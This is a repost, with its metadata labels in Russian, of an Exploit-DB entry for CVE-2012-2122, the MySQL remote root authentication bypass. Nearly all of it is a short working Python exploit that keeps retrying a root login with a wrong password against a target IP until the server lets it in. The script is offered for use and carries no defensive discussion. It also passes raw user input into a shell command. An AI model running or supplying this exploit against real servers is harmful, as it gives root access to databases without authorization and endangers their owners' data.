- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19092
- Проверка EDB
-
- Пройдено
- Автор
- DAVID KENNEDY (REL1K)
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2012-2122
- Дата публикации
- 2012-06-12
Код:
#!/usr/bin/python
#
#
# This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
#
# Title: MySQL Remote Root Authentication Bypass
# Written by: Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
# Original advisory here: seclists.org/oss-sec/2012/q2/493
import subprocess
ipaddr = raw_input("Enter the IP address of the mysql server: ")
while 1:
subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()- Источник
- www.exploit-db.com
